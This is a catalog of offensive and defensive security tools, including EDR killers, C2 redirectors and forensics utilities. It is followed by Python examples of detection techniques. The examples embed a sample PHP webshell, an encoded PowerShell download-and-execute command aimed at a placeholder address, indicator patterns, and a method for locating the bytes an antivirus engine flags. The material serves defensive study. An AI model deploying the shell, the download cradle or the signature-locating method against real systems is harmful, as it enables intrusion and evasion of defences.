Tools List
id | Description | Tags
---|---|---
1 | URLhaus is a project from abuse.ch with the goal of sharing malicious URLs that are being used for malware distribution. | reputation-engine, osint
3849572548 | This repo provides a list of telemetry features from EDR products and other endpoint agents such as Sysmon, broken down by category. | defensive-tradecraft, edr, github-repo, tradecraft-tool
3973554086 | MemoryPull is a simple (extremely simple) C# shellcode runner that calls out to an external server hosting raw shellcode and runs it. The URL is hard-coded inside the runner, so you don't have to enter anything at a command prompt. | edr-evasion, offensive-tradecraft, shellcode, shellcode-donut, tradecraft-tool
3867395334 | Danswer allows you to ask natural-language questions against internal documents and get back reliable answers backed by quotes and references from the source material, so that you can always trust what you get back. | ai-llm, defensive-tradecraft, tradecraft-tool
3804996147 | CCob/ThreadlessInject: threadless process injection using remote function hooking. | edr-evasion, github-repo, offensive-tradecraft, thread-injection, tradecraft-tool
3972863569 | TrueSightKiller is a C++ AV/EDR killer. The driver can be used on Windows 23H2 with HVCI enabled, the loldrivers blocklist, or WDAC enabled. | edr-evasion, github-repo, offensive-tradecraft, tactic-loldrivers, tradecraft-tool
3332623365 | MemProcFS-Analyzer.ps1 is a PowerShell script that simplifies the use of MemProcFS and assists with the analysis workflow. The latest version is available from the Releases section. | defensive-tradecraft, dfir, github-repo, memory-forensics, tradecraft-tool
3967322695 | (description not captured) | github-repo, offensive-tradecraft, tradecraft-tool
3210164956 | MOSINT is an OSINT tool for emails; it helps you gather information about a target email address. Press q to exit. | defensive-tradecraft, github-repo, threat-intel, tradecraft-tool
3967755283 | The Best EDR Of The Market (BEOTM) is an open-source EDR designed to serve as a testing ground for understanding and bypassing some of the detection mechanisms employed by many well-known EDRs. | defensive-tradecraft, github-repo, offensive-tradecraft, tradecraft-tool
3679070780 | The purpose of this repository is to bridge threat modeling and security-control definition by providing an equivalence table that maps the STRIDE model against the Application Security Verification Standard (ASVS) chapters. | defensive-tradecraft, github-repo, threat-intel, threat-modelling, tradecraft-tool
3964204184 | By conradculling. | defensive-tradecraft, gpt, machine-learning, threat-hunting, tradecraft-tool
3963789293 | The "Awesome GPTs (Agents) Repo" is an initial effort to compile a comprehensive, community-created list of GPT agents focused on cybersecurity (offensive and defensive). | defensive-tradecraft, github-repo, threat-intel, tradecraft-tool
2985774805 | This tool is designed to predict tactics and techniques from the ATT&CK framework (https://attack.mitre.org/) in cyber threat reports, such as the ones that can be linked in https://otx.alienvault.com/ or https://exchange.xforce.ibmcloud.com/. | automation, defensive-tradecraft, devops, intel-report, threat-intel, tradecraft-tool
3954029672 | WolfPack combines Terraform and Packer to streamline large-scale deployment of red team redirectors. It lets security professionals efficiently scale out the creation and management of Apache redirectors that mimic authentic websites. | c2, github-repo, offensive-tradecraft, tradecraft-tool
3955985426 | | machine-learning, ml, offensive-tradecraft, tradecraft-tool
3943932548 | BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc. infrastructure from blue teams, sandboxes, scanners, etc. | c2, github-repo, offensive-tradecraft, tradecraft-tool
3953069219 | FalconHound is a blue team multi-tool. It lets you use and enhance BloodHound in a more automated fashion and is designed to be used in conjunction with a SIEM or other log aggregation tool. One of the challenging aspects of BloodHound is that it is a snapshot in time. | active-directory, bloodhound, defensive-tradecraft, github-repo, tradecraft-tool
3692316176 | JSON Crack is a free, open-source JSON visualization app with an intuitive interface for exploring, analyzing and understanding even the most complex JSON structures. | data-analytics, data-visualization, defensive-tradecraft, github-repo, tradecraft-tool
3944101315 | Searches log files in AWS S3, optionally compressed with gzip (.gz) or zip (.zip). It can be run from a local laptop or from an EC2 instance in the same region as the S3 bucket to avoid egress charges, and supports several authentication methods. | aws-cloud, azure-cloud, cloud-forensics, defensive-tradecraft, dfir, github-repo, tradecraft-tool
3679900805 | PurpleCloud: an identity lab supporting Azure AD and Active Directory enterprise deployment with a SIEM in Azure. Easily build your own pentest / red team / cyber range in the Azure cloud. PurpleCloud was created as a platform for researching Azure identity. | azure-cloud, defensive-tradecraft, detection-lab, lab-environment, tradecraft-tool
3078278733 | Multi-use hybrid + identity cyber range implementing a small Active Directory domain in Azure alongside Azure AD and Azure Domain Services. | azure-ad, azure-cloud, defensive-tradecraft, github-repo, microsoft-entra, tradecraft-tool
3942431003 | Moonshine is a C2 framework with a custom Lua interpreter (called Moon) runtime at its core. The runtime is used in the implants to execute scripts on the remote host, with the option of loading Lua C or script modules to provide additional functionality. | mitre-attck, pkm-pocket-pipeline, splunk, summarize-article
3866913880 | This list can be valuable for threat hunters, SOC and CERT teams doing static analysis in a SIEM, as it helps identify threat actors (or red teamers) using the default configurations of well-known exploitation tools in logs. | defensive-tradecraft, github-repo, hunt-pipeline-2023, threat-hunting, threat-hunting-ideas, tradecraft-tool
3924452988 | Abuses the mhyprotect driver (not mhyprot2) to kill AVs / EDRs / XDRs / protected processes. | edr-evasion, github-repo, offensive-tradecraft, tradecraft-tool
3932010482 | powerpwn; run `powerpwn --help` to list all available commands. | azure-cloud, github-repo, offensive-tradecraft, tactic-persistence, tradecraft-tool
3930510823 | SCMUACBypass | cobalt-strike, github-repo, kerberos, offensive-tradecraft, tradecraft-tool
3856803752 | Breach Report Collection: a collection of companies that disclose adversary TTPs after they have been breached. Useful for analysis of intrusions with measurable effects and impact; entries record organization, breach date, adversary and source (for example Coinbase, February 2023, 0ktapus (suspected), source: coinbase). | defensive-tradecraft, github-repo, intel-report, threat-intel, tradecraft-tool
3745253003 | Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team. | backdoor, github-repo, kali-linux, linux, offensive-tradecraft, tradecraft-tool
3293389854 | Stands up simple Elastic containers with Kibana, Fleet and the Detection Engine. Requirements are minimal: *NIX or macOS, Docker, jq and Git. | defensive-tradecraft, detection-lab, github-repo, lab-environment, threat-hunting, tradecraft-tool
3909256490 | DFIR Toolkit: a set of timelining tools (cleanhive, evtx2bodyfile, evtxanalyze, evtxscan, evtxcat, evtxls, es4forensics, hivescan, ipgrep, lnk2bodyfile, mactime2, mft2bodyfile, ntdsextract2, pol_export, procbins, regdump, regls, regview, ts2date, usnjrnl_dump). | defensive-tradecraft, dfir, email-forensics, github-repo, offensive-tradecraft, osint, recon, tradecraft-tool
3129562429 | GHunt (v2) is an offensive Google framework designed to evolve efficiently. It is currently focused on OSINT, but any use related to Google is possible. It automatically uses venvs to avoid dependency conflicts with other projects. | defensive-tradecraft, dfir, email-forensics, github-repo, offensive-tradecraft, osint, recon, tradecraft-tool
3659224908 | (description not captured) | defensive-tradecraft, reverse-engineering, tradecraft-tool
3914031775 | (description not captured) | c2, defensive-tradecraft, github-repo, sliver-c2, tradecraft-tool
3874709184 | A tool written in Go whose main objective is to search for API keys in JavaScript files and HTML pages. It works by checking the source of web pages and script files for strings that are identical or similar to API keys. | api-security, defensive-tradecraft, github-repo, offensive-tradecraft, tradecraft-tool
2866115939 | Movekit is an extension of Cobalt Strike's built-in lateral movement that leverages the execute_assembly function with the SharpMove and SharpRDP .NET assemblies. The aggressor script handles payload creation by reading the template files for a specific execution type. | .net, cobalt strike, github-repo, offensive-tradecraft, threat-hunting-ideas, tradecraft-tool
3878855094 | This repository consists of tools/links that an expert can use during a pentest/red team. If a tool performs multiple functions, for example collecting subdomains and URLs, it is listed in two places. | defensive-tradecraft, github-repo, offensive-tradecraft, osint, tradecraft-tool
3906134084 | Scenario: you are Local Administrator and there is a logged-on user you want to impersonate. Goal: from Local Admin to Domain Admin with a Kerberos TGS. Required: Local Administrator and a Domain Admin logged on (or disconnected). In this guide the Domain Admin user is CALIPENDULA\fagiolo. | active-directory, github-repo, kerberos, offensive-tradecraft, tradecraft-tool
3905594543 | (description not captured; the repository contains README.md, dumper.ps1 and injector.ps1) | active-directory, github-repo, kerberos, offensive-tradecraft, tactic-cred-dumping, tradecraft-tool
3851019979 | Threat hunting queries for Microsoft 365 Defender (XDR): out-of-the-box KQL hunting queries for App, Email, Identity and Endpoint (KQL/KQL-Effective-Use at main, LearningKijo/KQL). | azure-cloud, data-exfiltration, defensive-tradecraft, github-repo, kql, tradecraft-tool
3902553840 | Get info on a website's SSL certs, domain, headers, cookies, DNS records, technologies used, performance, hostnames, crawl rules, server info and more. Often when I'm looking into a website, there are several things I always check first. | defensive-tradecraft, github-repo, offensive-tradecraft, tradecraft-tool
3804421977 | This tool detects artifacts of PowerShell-based malware in the event log produced by PowerShell logging. The resulting JSON file can be visualized with viewer.html. | defensive-tradecraft, deobfuscate, github-repo, powershell, tradecraft-tool
3902469158 | BadZure is a PowerShell script that leverages the Microsoft Graph SDK to orchestrate the setup of Azure Active Directory tenants, populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths. | defensive-tradecraft, github-repo, offensive-tradecraft, tradecraft-tool
3902110940 | | defensive-tradecraft, offensive-tradecraft, tradecraft-tool
1974988845 | LogonTracer is a tool to investigate malicious logons by visualizing and analyzing Windows Active Directory event logs. It associates the host name (or IP address) and account name found in logon-related events and displays them as a graph. | defensive-tradecraft, github-repo, tradecraft-tool
3853903502 | Collection of custom BloodHound queries, including new Azure and MS Graph-related queries. | apt, attack-path, pkm-pocket-pipeline, ransomware, summarize-article
3899656912 | (description not captured; the repository contains adversary_emulation/APT29/Emulation_Plan/Day 2/payloads) | github-repo, offensive-tradecraft, tactic-cred-dumping, tradecraft-tool
3890838999 | This Streamlit app helps you draft takedown requests to domain registrars. Created by Matt Adams. | ai-llm, defensive-tradecraft, github-repo, python, streamlit, tradecraft-tool
3843283896 | An AV/EDR evasion tool created to bypass security tools for learning; so far the tool is FUD. | bloodhound, cyber-deception, pkm-pocket-pipeline, summarize-article, threat-hunting
3114680822 | The purpose of this list is to track and compare tunneling solutions. It is primarily targeted at self-hosters and developers who want to do things like exposing a local web server via a public domain name, with automatic HTTPS, even from behind a NAT or other restricted network. | github-repo, offensive-tradecraft, tradecraft-tool
3247509232 | ScareCrow is a payload creation framework for side-loading (not injecting) into a legitimate Windows process, bypassing application whitelisting controls. | github-repo, offensive-tradecraft, technique-dll-sideload, tradecraft-tool
3493575212 | FastFinder (Incident Response - fast suspicious file finder) is a lightweight tool made for threat hunting, live forensics and triage on the Windows platform. | defensive-tradecraft, github-repo, ioc-scanner, tradecraft-tool, webshell
3888494661 | ShellSheep and its suite of tools calculate the entropy of file contents to estimate the likelihood of a file being a webshell. High entropy indicates more randomness, which is characteristic of the encrypted or obfuscated code often found in webshells. | defensive-tradecraft, github-repo, ioc-scanner, tradecraft-tool, webshell
3613938953 | (ASCII-art banner only; description not captured) | cyber-deception, defensive-tradecraft, tactic-session-enum, tradecraft-tool
3820737835 | A command-line utility that converts any binary file into a QR-code GIF. The data can then be reassembled visually, allowing exfiltration of data from air-gapped systems. | offensive-tradecraft, tactic-exfiltration, technique-data-encoding, tradecraft-tool
2896377399 | User enumeration via OneDrive. In this instance the username is 'lightmand' and the domain is 'acmecomputercompany.com'. If a user has logged into OneDrive, this path will exist and return a 403 status code; if they have not, or the user is invalid, it returns a 404. | azure-cloud, github-repo, o365, offensive-tradecraft, tradecraft-tool
3881540323 | | defensive-tradecraft, threat-intel, tradecraft-tool
3872092889 | AllForOne - Nuclei Template Collector: a Python script that allows bug bounty hunters and security researchers to collect all Nuclei YAML templates from various public repositories, helping to streamline the download process. | defensive-tradecraft, github-repo, offensive-tradecraft, pkm-pocket-pipeline, tradecraft-tool
3878056427 | Privilege escalation tools for Windows, Linux/Unix* and macOS. They search for possible local privilege escalation paths that you could exploit and print them with colour highlighting so the misconfigurations are easy to spot. | github-repo, offensive-tradecraft, pkm-pocket-pipeline, tradecraft-tool
3768625149 | | defensive-tradecraft, elastic-stack, kernel, pkm-pocket-pipeline, procedure-syscalls, process-telemetry, summarize-article
3857701478 | (description not captured) | defensive-tradecraft, elastic-stack, kernel, pkm-pocket-pipeline, procedure-syscalls, process-telemetry, summarize-article
3873454857 | Blackout leverages the gmer driver to disable or kill EDRs and AVs. The sample is sourced from loldrivers (https://www.loldrivers.io/drivers/7ce8fb06-46eb-4f4f-90d5-5518a6561f15/). Usage: place the driver Blackout.sys in the same path as the Blackout executable. | defensive-tradecraft, elastic-stack, kernel, pkm-pocket-pipeline, procedure-syscalls, process-telemetry, summarize-article
2952669086 | ROADtools is a framework to interact with Azure AD. It currently consists of a library (roadlib) and the ROADrecon Azure AD exploration tool. ROADlib can be used to authenticate with Azure AD or to build tools that integrate with a database containing ROADrecon data. | azure-ad, defensive-tradecraft, offensive-tradecraft, tradecraft-tool
3868557298 | ADCSKiller is a Python-based tool designed to automate the discovery and exploitation of Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify attacking ADCS infrastructure. | active-directory, offensive-tradecraft, tactic-ad-attack, tradecraft-tool
3401593384 | BeaconEye scans running processes for active Cobalt Strike beacons. When a process is found to be running Beacon, BeaconEye monitors it for C2 activity. | cobalt-strike-c2, defensive-tradecraft, tradecraft-tool
3141801589 | Modified version of Matterpreter's DefenderCheck. Takes a binary as input (either a file on disk or a URL), splits it until it pinpoints the exact bytes that the target engine flags on, and prints them to the screen. | malware-analysis, offensive-tradecraft, tactic-amsi-bypass, tradecraft-tool
3861437257 | This is where I will be storing all my malware-based projects as I venture into the mystic and unknown. I'll eventually write a detailed explanation of each project in this repo, so if there isn't one there when you're looking at it, I'll get to it eventually. | github-repo, offensive-tradecraft, procedure-syscalls, tactic-process-injection, tradecraft-tool
3674562225 | PersistenceSniper is a PowerShell script that Blue Teams, incident responders and system administrators can use to hunt persistence implanted on Windows machines. The script is also available on the PowerShell Gallery. Why write such a tool, you might ask. | defensive-tradecraft, github-repo, tactic-persistence, tradecraft-tool
3859416704 | | driver-control, github-repo, offensive-tradecraft, tradecraft-tool
3858610914 | ETWHash is a C# POC that extracts NetNTLMv2 hashes of incoming SMB authentications by consuming ETW events from the Microsoft-Windows-SMBServer provider {D48CE617-33A2-4BC3-A5C7-11AA4F29619E}. Administrative privileges are required. | github-repo, offensive-tradecraft, tool-adversary, tradecraft-tool
27046762 | So, you want to learn how to send your own fake mail? It's extraordinarily easy to do and requires no extra software installed on your PC at all. It can be done on Windows, Macintosh or Linux; any modern PC with an internet connection will do. There are just a few simple steps. | offensive-tradecraft, phishing, tradecraft-tool
3787833242 | C2-Hunter is a program designed for malware analysts to extract Command and Control (C2) traffic from malware in real time. It takes the approach of hooking the Win32 connection APIs. | defensive-tradecraft, github-repo, ioc-scanner, memory-forensics, tradecraft-tool
3814000165 | Kraken, version 1.0.0 (README in English and Spanish; sections: Requirements, Support, Install, Usage, Examples, Contributing, Bugs). Requirements: python3.8 (>= 3.8). | azure-cloud, cloud-attacks, cloud-forensics, email-compromise, microsoft-ual, summarize-article
3762553392 | IATelligence is a Python script that extracts the Import Address Table (IAT) from a PE file and uses OpenAI's GPT-3 model to provide details about each Windows API imported by the file. | defensive-tradecraft, github-repo, iat, reverse-engineer, threat-hunting, tools, tradecraft-tool
3279584999 | A collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems. | defensive-tradecraft, github-repo, reverse-engineering, tradecraft-tool
445320361 | Arsenal Image Mounter mounts the contents of disk images as complete disks in Microsoft Windows. | defensive-tradecraft, dfir, github-repo, image-mounter, tradecraft-tool
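The entropy heuristic that ShellSheep (row 3888494661) applies to webshell candidates, as an added Python example. This is not ShellSheep's code: it computes Shannon entropy over the whole file and over sliding windows, and the 5.5 bits/byte threshold and the sample files (a plain PHP shell, a base64-wrapped one, a benign page, and the benign page with the encoded shell appended) are constructed for illustration.

```python
import base64
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or single-symbol input, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def max_window_entropy(data: bytes, window: int = 256, step: int = 64) -> float:
    """Highest entropy over sliding windows. A small encoded blob appended to an
    otherwise ordinary file is averaged away by whole-file entropy but not by this."""
    if len(data) <= window:
        return shannon_entropy(data)
    return max(shannon_entropy(data[i:i + window])
               for i in range(0, len(data) - window + 1, step))


def score_file(data: bytes, threshold: float = 5.5) -> dict:
    """Flag a file when whole-file or peak-window entropy exceeds the threshold.
    5.5 is a hypothetical tuning value: base64 text tops out just under 6.0 bits/byte,
    while hand-written PHP/ASP usually sits around 4.5-5.0."""
    whole = shannon_entropy(data)
    peak = max_window_entropy(data)
    return {"whole": round(whole, 2), "peak_window": round(peak, 2),
            "suspicious": whole > threshold or peak > threshold}


# Constructed samples; none of these are real webshells from any dataset.
PLAIN_SHELL = (b"<?php if (isset($_GET['cmd'])) { echo '<pre>'; "
               b"system($_GET['cmd']); echo '</pre>'; } ?>\n")
_rng = random.Random(1)  # fixed seed so the numbers are reproducible
_blob = base64.b64encode(bytes(_rng.getrandbits(8) for _ in range(900)))
OBFUSCATED_SHELL = b"<?php eval(base64_decode('" + _blob + b"')); ?>\n"
BENIGN_PAGE = (b"<?php\n// Simple contact page\nfunction render($title) {\n"
               b"    echo '<h1>' . htmlspecialchars($title) . '</h1>';\n}\n"
               b"render('Contact us');\n") * 30
HIDDEN_BLOB = BENIGN_PAGE + OBFUSCATED_SHELL  # encoded payload buried in a benign file

if __name__ == "__main__":
    for name, sample in [("plain shell", PLAIN_SHELL), ("obfuscated shell", OBFUSCATED_SHELL),
                         ("benign page", BENIGN_PAGE), ("benign + hidden blob", HIDDEN_BLOB)]:
        print(f"{name:22} {score_file(sample)}")
```

Note what the numbers say: the plain `system($_GET['cmd'])` shell is not high-entropy at all, so entropy only catches the encoded or packed variants and has to be paired with signature or behaviour checks; the windowed score is what rescues the case where the encoded payload is a small part of a large legitimate file.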
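The splitting algorithm DefenderCheck-style tools (row 3141801589) use to pinpoint the bytes an engine flags on, as an added Python example that is not the tool's own code. The engine is replaced by a constructed `fake_engine` that flags a fixed hypothetical byte string, so the example runs offline; against a real engine each `is_flagged` call would be one scan of a temporary file.

```python
from typing import Callable, Optional, Tuple


def find_flagged_region(data: bytes,
                        is_flagged: Callable[[bytes], bool]) -> Optional[Tuple[int, int, int]]:
    """Locate the byte range the scanner keys on with two binary searches.
    Pass 1: shortest prefix data[:end] that is still flagged.
    Pass 2: longest suffix data[start:end] of that prefix that is still flagged.
    This assumes a monotone verdict (any span containing the signature is flagged,
    spans that cut it are not). Engines with several signatures, or ones that need
    surrounding context, break that assumption, which is why the real tools report
    one chunk at a time and expect you to re-run after neutralising it.
    Returns (start, end, number_of_scans) or None when the whole input is clean."""
    scans = 0

    def flagged(chunk: bytes) -> bool:
        nonlocal scans
        scans += 1
        return is_flagged(chunk)

    if not flagged(data):
        return None

    lo, hi = 1, len(data)                      # pass 1: minimal flagged prefix
    while lo < hi:
        mid = (lo + hi) // 2
        if flagged(data[:mid]):
            hi = mid
        else:
            lo = mid + 1
    end = lo

    lo, hi = 0, end - 1                        # pass 2: maximal start within that prefix
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if flagged(data[mid:end]):
            lo = mid
        else:
            hi = mid - 1
    return lo, end, scans


def hexdump(chunk: bytes, width: int = 16) -> str:
    lines = []
    for i in range(0, len(chunk), width):
        part = chunk[i:i + width]
        printable = "".join(chr(b) if 32 <= b < 127 else "." for b in part)
        lines.append(f"{i:04x}  {part.hex(' '):<{width * 3}} {printable}")
    return "\n".join(lines)


# Constructed stand-in for the AV engine: flags anything containing this hypothetical string.
SIGNATURE = b"BadStringTheEngineFlags"
SAMPLE_BINARY = b"\x4d\x5a" + b"A" * 98 + SIGNATURE + b"B" * 50


def fake_engine(chunk: bytes) -> bool:
    return SIGNATURE in chunk


if __name__ == "__main__":
    hit = find_flagged_region(SAMPLE_BINARY, fake_engine)
    if hit is None:
        print("clean")
    else:
        start, end, scans = hit
        print(f"flagged bytes at offset {start:#x}-{end:#x} after {scans} scans")
        print(hexdump(SAMPLE_BINARY[start:end]))
```

Both searches are logarithmic in the file size, so even a multi-megabyte binary needs a few dozen scans rather than one per byte; the cost that matters in practice is the per-scan latency of the real engine.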
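One kind of artifact a PowerShell event-log detector such as the one in row 3804421977 looks for, as an added Python example that is not that tool's code: decode `-EncodedCommand` arguments (base64 of UTF-16LE) from process-creation or script-block records and match a small set of download/execution/obfuscation indicators against both the raw and decoded text. The event records, the indicator list and the abbreviated-switch regex are constructed for illustration.

```python
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones
# seen in the wild (assumption: the list is illustrative, not exhaustive).
ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")

# (pattern, label) pairs matched case-insensitively against raw + decoded text.
INDICATORS = [
    (r"invoke-expression|\biex\b", "invoke-expression"),
    (r"frombase64string", "base64-decode"),
    (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", "web-download"),
    (r"-nop\b|-noprofile", "no-profile"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden-window"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "policy-bypass"),
    (r"\[char\]|-join\b", "string-obfuscation"),
]
INDICATOR_RES = [(re.compile(p, re.IGNORECASE), label) for p, label in INDICATORS]


def decode_encoded_command(text: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyse(event: dict) -> dict:
    """Score one event; script_block is used for 4104-style records, command_line otherwise."""
    text = event.get("script_block") or event.get("command_line") or ""
    decoded = decode_encoded_command(text)
    hits = ["encoded-command"] if decoded is not None else []
    haystack = text + "\n" + (decoded or "")
    hits += [label for rx, label in INDICATOR_RES if rx.search(haystack)]
    return {"event_id": event.get("event_id"), "decoded": decoded,
            "indicators": sorted(set(hits)), "suspicious": bool(hits)}


# Constructed events, not real logs; 203.0.113.10 is a documentation address.
_payload = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage1.ps1')"
_b64 = base64.b64encode(_payload.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"event_id": 4688, "command_line": f"powershell.exe -nop -w hidden -enc {_b64}"},
    {"event_id": 4104, "script_block": "$s=[System.Text.Encoding]::UTF8.GetString("
                                       "[Convert]::FromBase64String($x)); Invoke-Expression $s"},
    {"event_id": 4688, "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned "
                                       r"-File C:\scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = analyse(ev)
        print(r["event_id"], r["suspicious"], r["indicators"])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

The decode step matters more than the indicator list: without it the first event shows nothing but a base64 blob, and every one of its indicators lives inside the decoded text. Real deployments tune the list against their own baseline, since `-join` and `Invoke-WebRequest` also appear in legitimate administration scripts.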
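The account-to-host graph that LogonTracer (row 1974988845) builds from logon events, as an added Python example that is not LogonTracer's code. It reduces constructed 4624-style records to edges keyed on (account, host), keeps the logon types and source addresses seen on each edge, reports accounts that fan out to many hosts over network or RDP logons, and emits Graphviz DOT for the graph. The event records and the fan-out threshold are constructed for illustration.

```python
from collections import defaultdict

NETWORK_LOGON_TYPES = {3, 10}  # 3 = network (SMB/WMI/etc.), 10 = RemoteInteractive (RDP)

# Constructed 4624-style events trimmed to the fields the graph needs; not real logs.
SAMPLE_LOGONS = [
    {"ts": "2024-01-10T08:01:00", "host": "WS01",  "account": "alice",      "logon_type": 2,  "src_ip": "-"},
    {"ts": "2024-01-10T08:05:00", "host": "WS01",  "account": "bob",        "logon_type": 2,  "src_ip": "-"},
    {"ts": "2024-01-10T09:12:00", "host": "FS01",  "account": "svc_backup", "logon_type": 3,  "src_ip": "10.0.0.15"},
    {"ts": "2024-01-10T09:13:00", "host": "WS07",  "account": "svc_backup", "logon_type": 3,  "src_ip": "10.0.0.15"},
    {"ts": "2024-01-10T09:14:00", "host": "DC01",  "account": "svc_backup", "logon_type": 10, "src_ip": "10.0.0.15"},
    {"ts": "2024-01-10T09:20:00", "host": "SQL01", "account": "svc_backup", "logon_type": 3,  "src_ip": "10.0.0.15"},
    {"ts": "2024-01-10T10:00:00", "host": "WS02",  "account": "carol",      "logon_type": 2,  "src_ip": "-"},
]


def build_graph(events):
    """Edges (account, host) -> {types, src_ips, count} from logon events."""
    edges = defaultdict(lambda: {"types": set(), "src_ips": set(), "count": 0})
    for e in events:
        edge = edges[(e["account"], e["host"])]
        edge["types"].add(e["logon_type"])
        edge["count"] += 1
        if e["src_ip"] != "-":
            edge["src_ips"].add(e["src_ip"])
    return edges


def remote_fan_out(edges, min_hosts: int = 3):
    """Accounts that reached >= min_hosts distinct hosts over network/RDP logons.
    A service account touching many hosts from one workstation address is a classic
    lateral-movement shape that a single-host view never shows."""
    per_account = defaultdict(lambda: {"hosts": set(), "src_ips": set()})
    for (account, host), edge in edges.items():
        if edge["types"] & NETWORK_LOGON_TYPES:
            per_account[account]["hosts"].add(host)
            per_account[account]["src_ips"] |= edge["src_ips"]
    return {a: v for a, v in per_account.items() if len(v["hosts"]) >= min_hosts}


def hosts_for_account(edges, account: str):
    return sorted(host for (acct, host) in edges if acct == account)


def to_dot(edges) -> str:
    """Graphviz DOT; remote logons are dashed and labelled with the source address."""
    lines = ["digraph logons {", "  rankdir=LR;"]
    for (account, host), edge in sorted(edges.items()):
        style = "dashed" if edge["types"] & NETWORK_LOGON_TYPES else "solid"
        label = ",".join(sorted(edge["src_ips"])) or "local"
        lines.append(f'  "{account}" -> "{host}" [style={style}, label="{label}"];')
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    g = build_graph(SAMPLE_LOGONS)
    for account, info in remote_fan_out(g).items():
        print(f"{account}: {len(info['hosts'])} hosts from {sorted(info['src_ips'])}")
    print(to_dot(g))
```

Pipe the DOT output to `dot -Tsvg` to get the same picture LogonTracer draws; on real data, add the logon timestamp to the edge so the order of hops is visible.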
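The pattern-matching approach of the API-key scanner in row 3874709184, as an added Python example that is not that tool's code: known key formats are matched with fixed-prefix patterns, generic `api_key = "..."` assignments are caught by a looser regex, obvious placeholders are dropped, and the same value matched by two patterns is reported once with its line number. The patterns and the sample page (every key in it is fake) are constructed for illustration.

```python
import re

# Specific formats first so they win over the generic assignment match.
KEY_PATTERNS = [
    ("aws-access-key-id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("google-api-key", re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b")),
    ("github-pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
    ("generic-assignment", re.compile(
        r"""(?i)\b(?:api[_-]?key|secret|token|password)\b\s*[:=]\s*['"]([A-Za-z0-9_\-]{20,})['"]""")),
]
# Heuristic filter for documentation values; tune for your own code base.
PLACEHOLDER_RE = re.compile(r"(?i)your|example|xxxx|changeme|placeholder|dummy")


def scan(text: str, source: str = "page") -> list:
    """Return [{kind, value, line, source}] for every distinct key-like string."""
    findings, seen = [], set()
    for kind, rx in KEY_PATTERNS:
        for m in rx.finditer(text):
            value = m.group(1) if m.groups() else m.group(0)
            if value in seen or PLACEHOLDER_RE.search(value):
                continue
            seen.add(value)
            findings.append({"kind": kind, "value": value, "source": source,
                             "line": text.count("\n", 0, m.start()) + 1})
    return findings


def redact(value: str) -> str:
    """Show enough to recognise the key in a report without re-leaking it."""
    return value[:4] + "…" + value[-2:] if len(value) > 8 else "…"


# Constructed sample page; every key below is fake.
SAMPLE_HTML = """<html><head>
<script>
  // constructed sample; every key below is fake
  const cfg = { apiKey: "AIzaSyDaGmWKa4JsXZ-HjGw7ISLn_3namBGewQe", region: "us-east-1" };
  var AWS_KEY = "AKIAJK7Q3M2N8P4R6T5V"; // TODO: remove before release
  var gh = "ghp_" + "not_a_token";  // split string: intentionally not matched
  api_key = "YOUR_API_KEY_GOES_HERE_12345";
</script>
</head><body>token: "0123456789abcdef0123"</body></html>
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_HTML, source="index.html"):
        print(f"{f['source']}:{f['line']} {f['kind']:20} {redact(f['value'])}")
```

Two caveats the sample makes visible: a key split across string concatenation (the `ghp_` line) is invisible to regex scanning of static source, and the generic pattern's hit on a 20-character `token` value is only a lead until something verifies it, so a real scanner pairs this with an offline validity check or a manual review step.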